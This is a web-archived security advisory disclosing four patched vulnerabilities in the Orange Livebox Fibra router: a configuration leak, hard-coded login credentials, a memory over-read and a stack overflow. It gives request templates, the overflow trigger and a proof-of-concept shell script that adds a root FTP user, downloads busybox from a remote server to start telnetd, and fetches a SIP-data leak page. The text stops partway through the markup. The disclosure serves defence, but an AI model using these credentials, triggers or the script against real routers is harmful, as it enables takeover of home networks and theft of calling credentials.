{"id":10993,"date":"2018-01-03T14:19:25","date_gmt":"2018-01-03T22:19:25","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/01\/03\/news-4764\/"},"modified":"2018-01-03T14:19:25","modified_gmt":"2018-01-03T22:19:25","slug":"news-4764","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2018\/01\/03\/news-4764\/","title":{"rendered":"SSD Advisory \u2013 Livebox Fibra (Orange Router) Multiple Vulnerabilities"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Wed, 03 Jan 2018 06:33:51 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3585\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><br \/><script>var obj = jQuery('#a-href-3585');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script> See our full scope at: <a href=\"https:\/\/blogs.securiteam.com\/index.php\/product_scope\">https:\/\/blogs.securiteam.com\/index.php\/product_scope<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerabilities Summary<\/strong><br \/> The following advisory describes four (4) vulnerabilities found in Livebox Fibra router version AR_LBFIBRA_sp-00.03.04.112S. It is possible to chain the vulnerabilities into remote code execution.<\/p>\n<p>The &#8220;Livebox Fibra&#8221; router is &#8220;manufactured by Arcadyan for Orange and Jazztel in Spain&#8221;<\/p>\n<p>The vulnerabilities found in Arcadyan routers are:<\/p>\n<ul>\n<li>Unauthenticated configuration information leak<\/li>\n<li>Hard-coded credentials<\/li>\n<li>Memory leak<\/li>\n<li>Stack buffer Overflow<\/li>\n<\/ul>\n<p><strong>Credit<\/strong><br \/> An independent security researcher has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program<\/p>\n<p><strong>Vendor response<\/strong><br \/> Arcadyan and Orange were informed of the vulnerabilities and patched them.<br \/> <span id=\"more-3585\"><\/span><br \/> <strong><u>Vulnerabilities details<\/u><\/strong><br \/> <strong>Unauthenticated configuration information leak and weak usage of default users<\/strong><\/p>\n<p>The &#8220;Livebox Fibra&#8221; router web server does not properly filter GET request, an unauthenticated user can send the following GET request and get the configuration file from the router:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a4d56ec46c8f736410364\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> `http:\/\/IP\/cgi\/cgi_network_connected.js`<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0005 seconds] -->  <\/p>\n<p>The router uses an insecure way to get the configuration variables, it loads JavaScript files dinamically that set JS variables with the router configuration information.<\/p>\n<p><strong>Hard-coded credentials<\/strong><br \/> Default users that can be used to log in in the router&#8217;s website is: <code>ApiUsr<\/code>, with the password <code>ApiUsrPass<\/code> and <code>orangecare<\/code> with password <code>orange<\/code>.<\/p>\n<p><strong>Memory leak<\/strong><br \/> The router&#8217;s web server allows to configure multiple configuration variables. <\/p>\n<p>In order to configure one of those variables, it makes a POST request like the following:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a4d56ec46c99114522742\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &#8220;`  POST \/apply.cgi HTTP\/1.1  Host: 192.168.1.1  Accept-Encoding: gzip, deflate  Connection: keep-alive  Proxy-Connection: keep-alive  Accept: *\/*  User-Agent: A  Accept-Language: es-ES;q=1  Content-Length: 400    pi=[CSRF_TOKEN]&amp;SET0=[CFG_VAR_ID]%3D[CFG_VAR_VALUE]  &#8220;`<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46c99114522742-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46c99114522742-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46c99114522742-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46c99114522742-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46c99114522742-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46c99114522742-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46c99114522742-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46c99114522742-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46c99114522742-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46c99114522742-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46c99114522742-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46c99114522742-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46c99114522742-13\">13<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46c99114522742-1\"><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46c99114522742-2\"><span class=\"crayon-v\">POST<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">apply<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">cgi <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46c99114522742-3\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46c99114522742-4\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Encoding<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">gzip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">deflate<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46c99114522742-5\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">keep<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">alive<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46c99114522742-6\"><span class=\"crayon-v\">Proxy<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">keep<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">alive<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46c99114522742-7\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">*<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46c99114522742-8\"><span class=\"crayon-v\">User<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Agent<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">A<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46c99114522742-9\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Language<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">es<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">ES<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46c99114522742-10\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Length<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">400<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46c99114522742-11\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46c99114522742-12\"><span class=\"crayon-v\">pi<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">CSRF_TOKEN<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">SET0<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">CFG_VAR_ID<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">3D<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">CFG_VAR_VALUE<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46c99114522742-13\"><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0020 seconds] -->  <\/p>\n<p>CSRF_TOKEN &#8211; CSRF Token that changes for every POST request (We can generate a new token and use it in a new request on: http:\/\/IP\/cgi\/renewPi.js)<\/p>\n<p>CFG_VAR_ID &#8211; identifies the configuration variable that you want to modify (It changes at the same time that the CSRF_TOKEN changes). We can get the CFG_VAR_ID values from <code>http:\/\/IP\/cgi\/cgi_sys_smtp.js<\/code><\/p>\n<p>CFG_VAR_VALUE is the new value for the configuration variable<\/p>\n<p>In order to trigger the vulnerability, we sent a POST request to change the configuration (with correct &#8220;pi&#8221; and CFG_VAR_ID&#8221;) and a greater &#8220;Content-Length&#8221; for the request.<\/p>\n<p>The server uses the &#8220;Content-Length&#8221; calculate the length of the new value and then it uses the calculated size in &#8220;strncpy&#8221;.<\/p>\n<p>We can play with information in the POST request in order to achieve that &#8220;malloc&#8221; allocates our configuration value in an interesting zone in memory.<\/p>\n<p>The server correctly allocates memory for our new value, but in order to read and save the new configuration value, it reads out of bounds due to a bad calculation of the length (based on the &#8220;Content-length&#8221; header).<\/p>\n<p><strong>Stack buffer Overflow<\/strong><\/p>\n<p>The router&#8217;s has an API that provides the configuration variables values in JSON &#8211; It is used by the smartphone app, called &#8216;Mi Livebox&#8217;.<\/p>\n<p>&#8220;\/API\/Services\/Notifications\/EmailNotification&#8221; returns a JSON object with the email address configured to receive notifications when a new device connects to the network or when a new phone call arrives.<\/p>\n<p>The function is vulnerable to buffer-overflow in the URL request parser<\/p>\n<p>If we make a request like the following we will triage the vulnerability:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a4d56ec46ca1975660094\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> `http:\/\/IP\/API\/Services\/Notifications\/[A repeated 243 times]`<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46ca1975660094-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46ca1975660094-1\"><span class=\"crayon-sy\">`<\/span><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/IP\/API\/Services\/Notifications\/[A repeated 243 times]`<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0003 seconds] -->  <\/p>\n<p>We overwrite the following registers (MIPS Big Endian): s0, s1, s2, s3 and ra. Since we control **ra** we can control the flow of the program and jump to our shellcode. <\/p>\n<p>In order to exploit this vulnerability we have two problems:<\/p>\n<ul>\n<li>ASLR<\/li>\n<li>We cannot use special bytes on our exploit (spaces, null bytes..)<\/li>\n<\/ul>\n<p>This vulnerability is not exploitable by itself, but we can use the memory leak explained before in order to leak some memory address and calculate the Libc base.<\/p>\n<p>Then, we can use ROP gadgets from the libc or another lib, and finally get remote code execution.<\/p>\n<p><strong>Proof of Concept<\/strong><br \/> <u>pwn<\/u><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a4d56ec46ca7961153061\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #!\/bin\/sh    remoteServer=&#8221;192.168.1.63:8000&#8243;    # Create an user in the ProFTP Server with write privileges in \/  echo &#8220;x::0:0::.:sh&#8221; &gt;&gt; \/ramdisk\/etc\/proftpd\/passwd  sed -i &#8216;s\/DenyAll\/AllowAll\/&#8217; \/etc\/proftpd\/arc_proftpd.conf  killall proftpd  sleep 1 &amp;&amp; proftpd -c \/etc\/proftpd\/arc_proftpd.conf&amp;    # Download busybox with telnetd and start  cd \/bin  wget http:\/\/$remoteServer\/busybox-mips  chmod +x busybox-mips  busybox-mips telnetd    # Download leak SIP HTML to provide an easy way of getting the SIP data  cd \/www  wget http:\/\/$remoteServer\/leak_sip.htm    # restart server  killall arc_httpd  sleep 1 &amp;&amp; arc_httpd<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46ca7961153061-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46ca7961153061-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46ca7961153061-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46ca7961153061-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46ca7961153061-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46ca7961153061-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46ca7961153061-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46ca7961153061-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46ca7961153061-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46ca7961153061-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46ca7961153061-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46ca7961153061-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46ca7961153061-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46ca7961153061-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46ca7961153061-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46ca7961153061-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46ca7961153061-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46ca7961153061-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46ca7961153061-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46ca7961153061-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46ca7961153061-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46ca7961153061-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46ca7961153061-23\">23<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46ca7961153061-1\"><span class=\"crayon-p\">#!\/bin\/sh<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46ca7961153061-2\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46ca7961153061-3\"><span class=\"crayon-v\">remoteServer<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;192.168.1.63:8000&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46ca7961153061-4\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46ca7961153061-5\"><span class=\"crayon-p\"># Create an user in the ProFTP Server with write privileges in \/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46ca7961153061-6\"><span class=\"crayon-i\">echo<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;x::0:0::.:sh&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">ramdisk<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">etc<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">proftpd<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-e\">passwd<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46ca7961153061-7\"><span class=\"crayon-v\">sed<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;s\/DenyAll\/AllowAll\/&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">etc<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">proftpd<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">arc_proftpd<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">conf<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46ca7961153061-8\"><span class=\"crayon-e\">killall <\/span><span class=\"crayon-e\">proftpd<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46ca7961153061-9\"><span class=\"crayon-i\">sleep<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">proftpd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">etc<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">proftpd<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">arc_proftpd<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">conf<\/span><span class=\"crayon-o\">&amp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46ca7961153061-10\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46ca7961153061-11\"><span class=\"crayon-p\"># Download busybox with telnetd and start<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46ca7961153061-12\"><span class=\"crayon-v\">cd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-e\">bin<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46ca7961153061-13\"><span class=\"crayon-e\">wget <\/span><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/$remoteServer\/busybox-mips<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46ca7961153061-14\"><span class=\"crayon-v\">chmod<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-i\">x<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">busybox<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">mips<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46ca7961153061-15\"><span class=\"crayon-v\">busybox<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">mips <\/span><span class=\"crayon-v\">telnetd<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46ca7961153061-16\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46ca7961153061-17\"><span class=\"crayon-p\"># Download leak SIP HTML to provide an easy way of getting the SIP data<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46ca7961153061-18\"><span class=\"crayon-v\">cd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-e\">www<\/span><\/div>\n<div 